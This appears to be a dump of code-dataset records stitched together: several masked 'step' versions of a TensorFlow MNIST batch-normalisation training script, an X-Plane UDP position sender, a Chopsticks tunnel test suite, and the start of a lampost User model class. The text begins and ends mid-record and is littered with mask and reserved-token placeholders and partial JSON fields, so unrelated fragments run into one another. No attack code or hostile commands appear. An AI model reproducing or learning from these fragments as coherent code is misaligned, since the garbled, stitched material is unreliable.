sess.graph)\n sess.run(tf.global_variables_initializer())\n for batch_i in range(num_batches):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary = sess.run([train_opt, merged], {inputs: batch_xs,\n labels: batch_ys, is_training: True})\n writer.add_summary(summary, batch_i)\n if batch_i % 500 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.\n validation.images, labels: mnist.validation.labels,\n is_training: False})\n print(\n 'Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n elif batch_i % 100 == 0:\n loss, 
acc = sess.run([model_loss, accuracy], {inputs: batch_xs,\n labels: batch_ys, is_training: False})\n print(\n 'Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n acc = sess.run(accuracy, {inputs: mnist.validation.images, labels:\n mnist.validation.labels, is_training: False})\n print('Final validation accuracy: {:>3.5f}'.format(acc))\n acc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test\n .labels, is_training: False})\n print('Final test accuracy: {:>3.5f}'.format(acc))\n",
"step-3": "<mask token>\nmnist = input_data.read_data_sets('MNIST_data/', one_hot=True, reshape=False)\n\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False,\n activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\n\ndef conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):\n if layer_depth % 3 == 0:\n strides = 2\n else:\n strides = 1\n conv_layer = tf.layers.conv2d(prev_layer, layer_depth * 4, 3, strides,\n 'same', use_bias=False, activation=None)\n if batch_norm:\n conv_layer = tf.layers.batch_normalization(conv_layer, training=\n is_training)\n conv_layer = tf.nn.relu(conv_layer)\n return conv_layer\n\n\nnum_batches = 3000\nbatch_size = 128\nlearning_rate = 0.002\nlayer_num = 5\nbatch_norm = True\ninputs = tf.placeholder(tf.float32, [None, 28, 28, 1])\nlabels = tf.placeholder(tf.float32, [None, 10])\nis_training = tf.placeholder(tf.bool)\nlayer = inputs\nfor layer_i in range(1, 1 + layer_num):\n layer = conv_layer(layer, layer_i, batch_norm, is_training)\norig_shape = layer.get_shape().as_list()\nlayer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] *\n orig_shape[3]])\nlayer = fully_connected(layer, 100, batch_norm, is_training)\nlogits = tf.layers.dense(layer, 10)\nmodel_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=\n logits, labels=labels))\ntf.summary.scalar('conv_loss', model_loss)\nif batch_norm:\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\nelse:\n train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(\n model_loss)\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nwith tf.Session() as sess:\n merged = 
tf.summary.merge_all()\n if batch_norm:\n logdir = 'mnist/conv/SGD_batchnorm'\n else:\n logdir = 'mnist/conv/SGD_no_batchnorm'\n writer = tf.summary.FileWriter(logdir, sess.graph)\n sess.run(tf.global_variables_initializer())\n for batch_i in range(num_batches):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary = sess.run([train_opt, merged], {inputs: batch_xs,\n labels: batch_ys, is_training: True})\n writer.add_summary(summary, batch_i)\n if batch_i % 500 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.\n validation.images, labels: mnist.validation.labels,\n is_training: False})\n print(\n 'Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n elif batch_i % 100 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs,\n labels: batch_ys, is_training: False})\n print(\n 'Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n acc = sess.run(accuracy, {inputs: mnist.validation.images, labels:\n mnist.validation.labels, is_training: False})\n print('Final validation accuracy: {:>3.5f}'.format(acc))\n acc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test\n .labels, is_training: False})\n print('Final test accuracy: {:>3.5f}'.format(acc))\n",
"step-4": "import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('MNIST_data/', one_hot=True, reshape=False)\n\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False,\n activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\n\ndef conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):\n if layer_depth % 3 == 0:\n strides = 2\n else:\n strides = 1\n conv_layer = tf.layers.conv2d(prev_layer, layer_depth * 4, 3, strides,\n 'same', use_bias=False, activation=None)\n if batch_norm:\n conv_layer = tf.layers.batch_normalization(conv_layer, training=\n is_training)\n conv_layer = tf.nn.relu(conv_layer)\n return conv_layer\n\n\nnum_batches = 3000\nbatch_size = 128\nlearning_rate = 0.002\nlayer_num = 5\nbatch_norm = True\ninputs = tf.placeholder(tf.float32, [None, 28, 28, 1])\nlabels = tf.placeholder(tf.float32, [None, 10])\nis_training = tf.placeholder(tf.bool)\nlayer = inputs\nfor layer_i in range(1, 1 + layer_num):\n layer = conv_layer(layer, layer_i, batch_norm, is_training)\norig_shape = layer.get_shape().as_list()\nlayer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] *\n orig_shape[3]])\nlayer = fully_connected(layer, 100, batch_norm, is_training)\nlogits = tf.layers.dense(layer, 10)\nmodel_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=\n logits, labels=labels))\ntf.summary.scalar('conv_loss', model_loss)\nif batch_norm:\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\nelse:\n train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(\n model_loss)\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\naccuracy = 
tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nwith tf.Session() as sess:\n merged = tf.summary.merge_all()\n if batch_norm:\n logdir = 'mnist/conv/SGD_batchnorm'\n else:\n logdir = 'mnist/conv/SGD_no_batchnorm'\n writer = tf.summary.FileWriter(logdir, sess.graph)\n sess.run(tf.global_variables_initializer())\n for batch_i in range(num_batches):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary = sess.run([train_opt, merged], {inputs: batch_xs,\n labels: batch_ys, is_training: True})\n writer.add_summary(summary, batch_i)\n if batch_i % 500 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.\n validation.images, labels: mnist.validation.labels,\n is_training: False})\n print(\n 'Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n elif batch_i % 100 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs,\n labels: batch_ys, is_training: False})\n print(\n 'Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n acc = sess.run(accuracy, {inputs: mnist.validation.images, labels:\n mnist.validation.labels, is_training: False})\n print('Final validation accuracy: {:>3.5f}'.format(acc))\n acc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test\n .labels, is_training: False})\n print('Final test accuracy: {:>3.5f}'.format(acc))\n",
"step-5": "import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True, reshape=False)\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False, activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\ndef conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):\n\tif layer_depth % 3 == 0:\n\t strides = 2\n\telse:\n\t\tstrides = 1\n\tconv_layer = tf.layers.conv2d(prev_layer, layer_depth*4, 3, strides, 'same', use_bias=False, activation=None)\n\tif batch_norm:\n\t\tconv_layer = tf.layers.batch_normalization(conv_layer, training=is_training)\n\tconv_layer = tf.nn.relu(conv_layer)\n\treturn conv_layer\n\n\nnum_batches = 3000\nbatch_size = 128\nlearning_rate = 0.002\nlayer_num = 5\nbatch_norm = True\n\ninputs = tf.placeholder(tf.float32, [None, 28, 28, 1])\nlabels = tf.placeholder(tf.float32, [None, 10])\nis_training = tf.placeholder(tf.bool)\n\nlayer = inputs\nfor layer_i in range(1, 1+layer_num):\n layer = conv_layer(layer, layer_i, batch_norm, is_training)\n\norig_shape = layer.get_shape().as_list()\n\nlayer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])\nlayer = fully_connected(layer, 100, batch_norm, is_training)\n\nlogits = tf.layers.dense(layer, 10)\nmodel_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))\ntf.summary.scalar('conv_loss',model_loss)\n\nif batch_norm: \n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n #train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(model_loss)\n\t\t#train_opt = tf.train.RMSPropOptimize(learning_rate).minimize(model_loss)\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\nelse:\n train_opt = 
tf.train.GradientDescentOptimizer(learning_rate).minimize(model_loss)\n\t#train_opt = tf.train.RMSPropOptimize(learning_rate).minimize(model_loss)\n\t#train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\n\ncorrect_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n \n\nwith tf.Session() as sess:\n\tmerged = tf.summary.merge_all()\n\tif batch_norm: \n\t\tlogdir = \"mnist/conv/SGD_batchnorm\"\n\telse:\n\t\tlogdir = \"mnist/conv/SGD_no_batchnorm\"\n\twriter = tf.summary.FileWriter(logdir, sess.graph)\n\n\tsess.run(tf.global_variables_initializer())\n\tfor batch_i in range(num_batches):\n\t\tbatch_xs, batch_ys = mnist.train.next_batch(batch_size)\n\n\t\t_,summary = sess.run([train_opt,merged], {inputs: batch_xs, labels: batch_ys, is_training: True})\n\t\t\n\t\twriter.add_summary(summary, batch_i)\n\n\t\tif batch_i % 500 == 0:\n\t\t\tloss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images, labels: mnist.validation.labels, is_training: False})\n\t\t\tprint('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))\n\t\telif batch_i % 100 == 0:\n\t\t\tloss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys, is_training: False})\n\t\t\tprint('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))\n\n\tacc = sess.run(accuracy, {inputs: mnist.validation.images, labels: mnist.validation.labels,is_training: False})\n\tprint('Final validation accuracy: {:>3.5f}'.format(acc))\n\tacc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test.labels,is_training: False})\n\tprint('Final test accuracy: {:>3.5f}'.format(acc))",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class XPlaneDataOut:
def __init__(self, host: str, port: int) ->None:
self.address = host, port
self.socket = socket.socket(family=socket.AF_INET, type=socket.
SOCK_DGRAM)
def write(self, data: Position) ->None:
self.socket.sendto(_encode(data), self.address)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _encode(position: Position) ->bytes:
return _START_BUFFER + struct.pack('<fff', position.latitude, position.
longitude, position.altitude
) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.
transponder) + _END_TRANSPONDER
class XPlaneDataOut:
def __init__(self, host: str, port: int) ->None:
self.address = host, port
self.socket = socket.socket(family=socket.AF_INET, type=socket.
SOCK_DGRAM)
def write(self, data: Position) ->None:
self.socket.sendto(_encode(data), self.address)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])
_END_BUFFER = bytes([0] * 20)
_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])
_END_TRANSPONDER = bytes([0] * 24)
def _encode(position: Position) ->bytes:
return _START_BUFFER + struct.pack('<fff', position.latitude, position.
longitude, position.altitude
) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.
transponder) + _END_TRANSPONDER
class XPlaneDataOut:
def __init__(self, host: str, port: int) ->None:
self.address = host, port
self.socket = socket.socket(family=socket.AF_INET, type=socket.
SOCK_DGRAM)
def write(self, data: Position) ->None:
self.socket.sendto(_encode(data), self.address)
<|reserved_special_token_1|>
import socket
import struct
from fsuipc_airspaces.position import Position
_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])
_END_BUFFER = bytes([0] * 20)
_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])
_END_TRANSPONDER = bytes([0] * 24)
def _encode(position: Position) ->bytes:
return _START_BUFFER + struct.pack('<fff', position.latitude, position.
longitude, position.altitude
) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.
transponder) + _END_TRANSPONDER
class XPlaneDataOut:
def __init__(self, host: str, port: int) ->None:
self.address = host, port
self.socket = socket.socket(family=socket.AF_INET, type=socket.
SOCK_DGRAM)
def write(self, data: Position) ->None:
self.socket.sendto(_encode(data), self.address)
<|reserved_special_token_1|>
import socket
import struct
from fsuipc_airspaces.position import Position
# Adapted from tools/faker.js in github.com/foucdeg/airspaces
# Framing constants for the X-Plane UDP data-out packet. Values are unchanged:
# b"DATA<\x14" is exactly bytes([68, 65, 84, 65, 60, 20]) -- presumably the
# X-Plane "DATA" header plus a record index; confirm against X-Plane UDP docs.
_START_BUFFER = b"DATA<\x14" + bytes(3)
_END_BUFFER = bytes(20)
_START_TRANSPONDER = b"h" + bytes(7)
_END_TRANSPONDER = bytes(24)


def _encode(position: Position) -> bytes:
    """Pack *position* into the raw UDP frame X-Plane expects."""
    coords = struct.pack("<fff", position.latitude, position.longitude, position.altitude)
    squawk = struct.pack("<f", position.transponder)
    return b"".join((
        _START_BUFFER,
        coords,
        _END_BUFFER,
        _START_TRANSPONDER,
        squawk,
        _END_TRANSPONDER,
    ))
class XPlaneDataOut:
    """Push encoded Position frames to an X-Plane instance over UDP."""

    def __init__(self, host: str, port: int) -> None:
        """Open a UDP socket aimed at *host*:*port*."""
        self.address = host, port
        self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)

    def write(self, data: Position) -> None:
        """Encode *data* and send it to the configured address."""
        packet = _encode(data)
        self.socket.sendto(packet, self.address)
|
flexible
|
{
"blob_id": "68fa47e528e5c7c553c3c49ee5b7372b8a956302",
"index": 3364,
"step-1": "<mask token>\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-2": "<mask token>\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-3": "<mask token>\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-4": "import socket\nimport struct\nfrom fsuipc_airspaces.position import Position\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-5": "import socket\nimport struct\n\nfrom fsuipc_airspaces.position import Position\n\n\n# Adapted from tools/faker.js in github.com/foucdeg/airspaces\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) -> bytes:\n return _START_BUFFER \\\n + struct.pack(\"<fff\", position.latitude, position.longitude, position.altitude) \\\n + _END_BUFFER \\\n + _START_TRANSPONDER \\\n + struct.pack(\"<f\", position.transponder) \\\n + _END_TRANSPONDER\n\n\nclass XPlaneDataOut():\n def __init__(self, host: str, port: int) -> None:\n self.address = (host, port)\n\n self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n def write(self, data: Position) -> None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class RecursiveTest(TestCase):
<|reserved_special_token_0|>
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(res, [3, 6])
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(RemoteException,
'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RecursiveTest(TestCase):
docker_name = 'unittest-36'
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(res, [3, 6])
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(RemoteException,
'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def ping_docker():
"""Start a docker container and read out its Python version."""
with Docker('unittest-36', image='python:3.6') as tun:
return tun.call(python_version)[:2]
def recursive():
"""Infinite recursion, requiring depth limit to stop."""
with Local() as tun:
tun.call(recursive)
class RecursiveTest(TestCase):
docker_name = 'unittest-36'
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(res, [3, 6])
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(RemoteException,
'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from unittest import TestCase
from chopsticks.helpers import output_lines
from chopsticks.tunnel import Local, Docker, RemoteException
from chopsticks.facts import python_version
def ping_docker():
"""Start a docker container and read out its Python version."""
with Docker('unittest-36', image='python:3.6') as tun:
return tun.call(python_version)[:2]
def recursive():
"""Infinite recursion, requiring depth limit to stop."""
with Local() as tun:
tun.call(recursive)
class RecursiveTest(TestCase):
docker_name = 'unittest-36'
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(res, [3, 6])
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(RemoteException,
'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
<|reserved_special_token_1|>
"""Test that Chopsticks remote processes can launch tunnels."""
from unittest import TestCase
from chopsticks.helpers import output_lines
from chopsticks.tunnel import Local, Docker, RemoteException
from chopsticks.facts import python_version
def ping_docker():
    """Spin up the test docker container and report its Python version.

    Returns the [major, minor] pair from the python_version fact, gathered
    inside a python:3.6 container tunnel.
    """
    with Docker('unittest-36', image='python:3.6') as tun:
        version = tun.call(python_version)
    return version[:2]
def recursive():
    """Infinite recursion, requiring depth limit to stop.

    Each call opens a fresh Local tunnel and calls itself through it, so
    only the tunnel depth limit can terminate the chain.
    """
    with Local() as tun:
        tun.call(recursive)
class RecursiveTest(TestCase):
    """Tests for launching tunnels from inside other tunnels."""

    # Name of the docker container ping_docker() starts; must be cleaned
    # up by the time each test finishes.
    docker_name = 'unittest-36'

    def tearDown(self):
        """Fail if the test container survived the test."""
        ls = output_lines(['docker', 'ps', '-a'])
        # Skip the `docker ps` header row; the container name is the last
        # whitespace-separated field of each remaining row.
        images = [l.split()[-1] for l in ls[1:]]
        assert self.docker_name not in images, \
            "Image %r remained running after test" % self.docker_name

    def test_python_version(self):
        """We can start a sub-tunnel from within a tunnel."""
        with Local() as tun:
            res = tun.call(ping_docker)
            self.assertEqual(
                res,
                [3, 6]
            )

    def test_depth_limit(self):
        """Recursive tunneling is limited by a depth limit."""
        # assertRaisesRegexp was a deprecated alias removed in Python 3.12;
        # assertRaisesRegex is the supported spelling.
        with self.assertRaisesRegex(
                RemoteException,
                r'.*DepthLimitExceeded: Depth limit of 2 ' +
                'exceeded at localhost -> localhost -> localhost'):
            recursive()
|
flexible
|
{
"blob_id": "4c63072b6242507c9b869c7fd38228488fda2771",
"index": 6098,
"step-1": "<mask token>\n\n\nclass RecursiveTest(TestCase):\n <mask token>\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(res, [3, 6])\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(RemoteException, \n '.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n",
"step-2": "<mask token>\n\n\nclass RecursiveTest(TestCase):\n docker_name = 'unittest-36'\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(res, [3, 6])\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(RemoteException, \n '.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n",
"step-3": "<mask token>\n\n\ndef ping_docker():\n \"\"\"Start a docker container and read out its Python version.\"\"\"\n with Docker('unittest-36', image='python:3.6') as tun:\n return tun.call(python_version)[:2]\n\n\ndef recursive():\n \"\"\"Infinite recursion, requiring depth limit to stop.\"\"\"\n with Local() as tun:\n tun.call(recursive)\n\n\nclass RecursiveTest(TestCase):\n docker_name = 'unittest-36'\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(res, [3, 6])\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(RemoteException, \n '.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n",
"step-4": "<mask token>\nfrom unittest import TestCase\nfrom chopsticks.helpers import output_lines\nfrom chopsticks.tunnel import Local, Docker, RemoteException\nfrom chopsticks.facts import python_version\n\n\ndef ping_docker():\n \"\"\"Start a docker container and read out its Python version.\"\"\"\n with Docker('unittest-36', image='python:3.6') as tun:\n return tun.call(python_version)[:2]\n\n\ndef recursive():\n \"\"\"Infinite recursion, requiring depth limit to stop.\"\"\"\n with Local() as tun:\n tun.call(recursive)\n\n\nclass RecursiveTest(TestCase):\n docker_name = 'unittest-36'\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(res, [3, 6])\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(RemoteException, \n '.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n",
"step-5": "\"\"\"Test that Chopsticks remote processes can launch tunnels.\"\"\"\nfrom unittest import TestCase\nfrom chopsticks.helpers import output_lines\nfrom chopsticks.tunnel import Local, Docker, RemoteException\nfrom chopsticks.facts import python_version\n\n\ndef ping_docker():\n \"\"\"Start a docker container and read out its Python version.\"\"\"\n with Docker('unittest-36', image='python:3.6') as tun:\n return tun.call(python_version)[:2]\n\n\ndef recursive():\n \"\"\"Infinite recursion, requiring depth limit to stop.\"\"\"\n with Local() as tun:\n tun.call(recursive)\n\n\nclass RecursiveTest(TestCase):\n docker_name = 'unittest-36'\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, \\\n \"Image %r remained running after test\" % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(\n res,\n [3, 6]\n )\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(\n RemoteException,\n r'.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
from base64 import b64decode
import time
from lampost.context.resource import m_requires
from lampost.datastore.dbo import KeyDBO
from lampost.datastore.dbofield import DBOField
from lampost.datastore.exceptions import DataError
from lampost.model.player import Player
from lampost.util.encrypt import make_hash, check_password
from lampost.util.lputil import ClientError
m_requires(__name__, 'log', 'perm', 'datastore', 'dispatcher')
class User(KeyDBO):
    """Persistent account record; one user may own several players.

    The DBOField descriptors define the persisted attributes, and
    dbo_indexes makes user_name and email queryable via secondary indexes.
    """
    dbo_key_type = "user"
    dbo_set_key = "users"
    dbo_indexes = "user_name", "email"

    user_name = DBOField('')  # account/login name
    password = DBOField()  # stored hash (may still be the legacy salted format)
    password_reset = DBOField(False)  # True forces a password reset on next login
    email = DBOField('')
    notes = DBOField('')  # free-form admin notes about the account
    player_ids = DBOField([])  # dbo_ids of the players owned by this account
